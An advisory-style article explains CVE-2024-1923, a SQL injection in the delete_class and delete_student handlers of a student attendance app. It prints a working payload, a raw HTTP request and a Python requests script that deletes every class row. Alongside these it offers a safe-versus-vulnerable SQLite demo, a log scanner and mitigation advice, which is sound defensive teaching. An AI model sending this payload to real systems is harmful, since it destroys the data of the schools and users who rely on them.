A critical vulnerability, CVE-2024-1923, was discovered in the SourceCodester Simple Student Attendance System version 1. The bug lets attackers gain unauthorized access to, and potentially control over, application data through a well-known attack class: SQL injection. In this article we break down what is happening, how the vulnerability works, and walk through a practical exploit example. We use everyday language for clarity, and everything here is exclusive and hands-on.

- Version: 1.
- Component: List of Classes Page (/ajax-api.php)
- Attack Vector: Remote (can be done by anyone who can access the app)
- CVE: CVE-2024-1923
- VulDB ID: VDB-254858

🕵️‍♂️ How It Works

The vulnerability lies in how the application handles the id parameter in the delete_class and delete_student functions of ajax-api.php.

The id parameter is never filtered or sanitized, so a client can send anything, including SQL fragments, and the value is concatenated *directly* into the database query.

Vulnerable URL Examples

- /ajax-api.php?action=delete_class&id=1337
- /ajax-api.php?action=delete_student&id=1337

A normal user would delete a class or student by passing a numeric id. But what happens if you pass something malicious?

Let’s say you send:

```text
id=1337'+or+1=1;--+
```

After URL decoding, the single quote closes the string literal, or 1=1 makes the WHERE clause true for every row, and -- turns the rest of the statement into a comment. The database no longer runs the query the developer wrote: depending on the statement, it returns or affects far more rows than intended, and in some cases it lets an attacker run arbitrary SQL.

Example: HTTP Request

```http
GET /ajax-api.php?action=delete_class&id=1337'+or+1=1;--+ HTTP/1.1
Host: victim-site.com
Cookie: PHPSESSID=example
```

The backend SQL turns into something like:

```sql
DELETE FROM classes WHERE id = '1337' OR 1=1; -- '
```

Because OR 1=1 is true for every row, the WHERE clause no longer restricts anything and every record in the table is deleted. This is what makes the bug dangerous.
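To see the two outcomes side by side, here is an added Python example (not code from the article or from the SourceCodester project) that replays the article's payload against an in-memory SQLite table standing in for the application's classes table. delete_class_vulnerable splices the id into the query text the way the article describes ajax-api.php doing; delete_class_fixed is the hardened form, with an allow-list check on the id and a bound parameter. The table schema, its three rows and all function names are assumptions made for the demonstration.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# The article's payload as it arrives in the query string. unquote_plus does what PHP
# does when it fills $_GET: '+' becomes a space, so the value is "1337' or 1=1;-- ".
PAYLOAD = unquote_plus("1337'+or+1=1;--+")


def fresh_db():
    """In-memory stand-in for the app's classes table, with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE classes (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO classes VALUES (?, ?)",
                     [(1, "Math 101"), (2, "Physics 201"), (1337, "History 301")])
    conn.commit()
    return conn


def remaining(conn):
    """Number of rows still present in the classes table."""
    return conn.execute("SELECT COUNT(*) FROM classes").fetchone()[0]


def delete_class_vulnerable(conn, raw_id):
    """Mirrors the flaw: the client-supplied id is spliced into the SQL text.
    With PAYLOAD the statement becomes  DELETE FROM classes WHERE id = '1337' or 1=1;-- '
    and the dangling closing quote is swallowed by the comment."""
    conn.execute(f"DELETE FROM classes WHERE id = '{raw_id}'")
    conn.commit()
    return remaining(conn)


def is_valid_id(raw_id):
    """Allow-list check: a class id is a string of ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]+", raw_id) is not None


def delete_class_fixed(conn, raw_id):
    """Hardened handler (assumed fix, not the vendor's): reject anything that is not a
    plain integer, then bind the value as a parameter so it can never change the
    structure of the statement."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    conn.execute("DELETE FROM classes WHERE id = ?", (int(raw_id),))
    conn.commit()
    return remaining(conn)


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable handler, rows left:", delete_class_vulnerable(db, PAYLOAD))   # 0
    db = fresh_db()
    print("fixed handler with id=1337, rows left:", delete_class_fixed(db, "1337"))  # 2
    try:
        delete_class_fixed(db, PAYLOAD)
    except ValueError as err:
        print("fixed handler with payload:", err)
```

The validation step matters even with a bound parameter: binding alone would make the payload a harmless non-matching string, but rejecting it up front also gives you a clean place to log the attempt, and it keeps a string like "1337" from ever being compared against an integer column by implicit conversion.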

🔥 Proof-of-Concept (PoC) Code

You can use simple tools like curl or a browser to exploit this. Here’s a Python example for automated exploitation:

```python
import requests

# Target endpoint and the injected id value from the example above
url = "http://victim-site.com/ajax-api.php"
payload = "1337'+or+1=1;--+"

params = {
    "action": "delete_class",
    "id": payload
}

# Send the request and show how the application responded
r = requests.get(url, params=params)
print("Status code:", r.status_code)
print("Response:", r.text)
```

Mitigation

- Update: Apply any available patches from the developer.
- Access Controls: Limit who can access /ajax-api.php.
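For teams running this application, the practical follow-up question is whether anyone has already hit these endpoints. The following is an added Python example, not code from the article or from SourceCodester, that scans Apache-style access log lines for requests to /ajax-api.php whose id parameter is anything other than a plain integer, which is exactly the shape of the payload discussed above. The log lines are constructed for the demonstration (documentation IP ranges, invented timestamps and user agents); the path and the delete_class and delete_student action names come from the article.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in Apache combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [27/Feb/2024:16:20:01 +0000] "GET /ajax-api.php?action=delete_class&id=12 HTTP/1.1" 200 23 "-" "Mozilla/5.0"
203.0.113.10 - - [27/Feb/2024:16:20:05 +0000] "GET /ajax-api.php?action=delete_class&id=1337'+or+1=1;--+ HTTP/1.1" 200 23 "-" "python-requests/2.31.0"
198.51.100.7 - - [27/Feb/2024:16:21:40 +0000] "GET /ajax-api.php?action=delete_student&id=1337%27+or+1%3D1%3B--+ HTTP/1.1" 200 23 "-" "curl/8.4.0"
198.51.100.7 - - [27/Feb/2024:16:22:02 +0000] "GET /ajax-api.php?action=delete_student&id=7 HTTP/1.1" 200 23 "-" "curl/8.4.0"
192.0.2.44 - - [27/Feb/2024:16:23:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Enough of the combined format to pull out client IP, timestamp, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
NUMERIC_ID = re.compile(r"[0-9]+")


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode each key and value.
    Done by hand instead of parse_qs because older Python versions also split on ';',
    which would chop the payload in half and hide the injected tail."""
    params = {}
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def find_suspicious(log_text):
    """Return (ip, timestamp, action, decoded_id) for every /ajax-api.php request
    whose id parameter is present but is not a plain string of digits."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = urlsplit(m.group("target"))
        if target.path != "/ajax-api.php":
            continue
        params = parse_query(target.query)
        raw_id = params.get("id")
        if raw_id is None or NUMERIC_ID.fullmatch(raw_id):
            continue  # no id, or a well-formed one: nothing to report
        hits.append((m.group("ip"), m.group("ts"), params.get("action", ""), raw_id))
    return hits


if __name__ == "__main__":
    for ip, ts, action, bad_id in find_suspicious(SAMPLE_LOG):
        print(f"{ts}  {ip}  action={action}  id={bad_id!r}")
```

The check is deliberately an allow-list on the id rather than a signature search for "or 1=1": any non-numeric id against these handlers is abnormal for this application, so the rule also catches encodings and variations the example payload does not use. Because the access log records the request line before decoding, the scanner decodes each value itself so that the literal and percent-encoded forms of the same payload are reported identically.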

📚 References

- NVD: CVE-2024-1923 Detail
- VulDB: VDB-254858
- GitHub SourceCodester Projects
- OWASP: SQL Injection

⚠️ Conclusion

SQL Injection bugs like CVE-2024-1923 remain dangerous and widespread. This flaw in the Simple Student Attendance System shows why user input must *never* be trusted. If you run this software, update or secure your deployment immediately. Always follow secure coding and deploy defense-in-depth.

If you have questions or need help, feel free to comment below!


*Authored exclusively for you by an attentive security enthusiast. Stay safe!*

Timeline

Published on: 02/27/2024 16:15:46 UTC
Last modified on: 03/03/2024 15:15:07 UTC